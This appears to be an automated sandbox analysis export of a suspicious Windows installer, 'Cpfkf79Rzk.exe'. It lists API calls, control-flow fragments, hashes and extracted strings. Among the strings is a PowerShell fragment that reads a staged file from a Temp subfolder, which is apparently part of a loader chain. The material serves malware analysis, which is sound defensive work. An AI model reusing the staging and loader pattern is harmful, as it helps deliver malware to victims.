                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                        Similarity
                                                                                                        • API ID: Close$Enum
                                                                                                        • String ID:
                                                                                                        • API String ID: 464197530-0
                                                                                                        • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                        • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                        • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                        • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 782 4015c1-4015d5 call 402c41 call 405c04 787 401631-401634 782->787 788 4015d7-4015ea call 405b86 782->788 790 401663-402250 call 401423 787->790 791 401636-401655 call 401423 call 406284 SetCurrentDirectoryW 787->791 796 401604-401607 call 405838 788->796 797 4015ec-4015ef 788->797 803 402ac5-402ad4 790->803 804 40288b-402892 790->804 791->803 809 40165b-40165e 791->809 807 40160c-40160e 796->807 797->796 800 4015f1-4015f8 call 405855 797->800 800->796 815 4015fa-401602 call 4057bb 800->815 804->803 811 401610-401615 807->811 812 401627-40162f 807->812 809->803 813 401624 811->813 814 401617-401622 GetFileAttributesW 811->814 812->787 812->788 813->812 814->812 814->813 815->807
                                                                                                        APIs
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C12
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                                          • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                          • Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,00000000,000000F0), ref: 0040164D
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\depersonaliseredes, xrefs: 00401640
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes
                                                                                                        • API String ID: 1892508949-2980550815
                                                                                                        • Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                        • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                                                        • Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
                                                                                                        • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                                                        APIs
                                                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
                                                                                                        • RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3
                                                                                                        Similarity
                                                                                                        • API ID: CloseQueryValue
                                                                                                        • String ID: : Completed
                                                                                                        • API String ID: 3356406503-2954849223
                                                                                                        • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                        • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                                        • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                        • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                        Strings
                                                                                                        • Error launching installer, xrefs: 00405880
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: Error launching installer
                                                                                                        • API String ID: 3712363035-66219284
                                                                                                        • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                        • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                        • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                        • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                        • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                        • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                        • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree
                                                                                                        • String ID: Polystichoid
                                                                                                        • API String ID: 3394109436-2603710711
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        Similarity
                                                                                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2520467145-0
                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        APIs
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2831762973-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ShowWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1268545403-0
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                          • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                          • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                                          • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547128583-0
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1375471231-0
                                                                                                        APIs
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 390214022-0
                                                                                                        • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                        • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                        • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                        • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                        • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                        • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                                                        APIs
                                                                                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PathSearch
                                                                                                        • String ID:
                                                                                                        • API String ID: 2203818243-0
                                                                                                        • Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                        • Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
                                                                                                        • Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                                                        • Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                        • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                                        • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                        • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                        • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                                                        • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                        • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                                                        APIs
                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1096422788-0
                                                                                                        • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                        • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                                                        • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                        • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID:
                                                                                                        • API String ID: 71445658-0
                                                                                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                        • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                        • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                                                        APIs
                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        APIs
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 004058BF
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID:
                                                                                                        • API String ID: 587946157-0
                                                                                                        APIs
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                                        Similarity
                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2492992576-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                          • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                          • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                          • Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                          • Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                                                          • Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
                                                                                                          • Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2972824698-0
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                        • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                        • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1638840714-813528018
                                                                                                        • Opcode ID: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                        • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                        • Opcode Fuzzy Hash: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                        • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                        • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
                                                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                          • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                          • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                        • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                          • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                          • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                          • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$: Completed$A$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$dL$6B
                                                                                                        • API String ID: 2624150263-1207239112
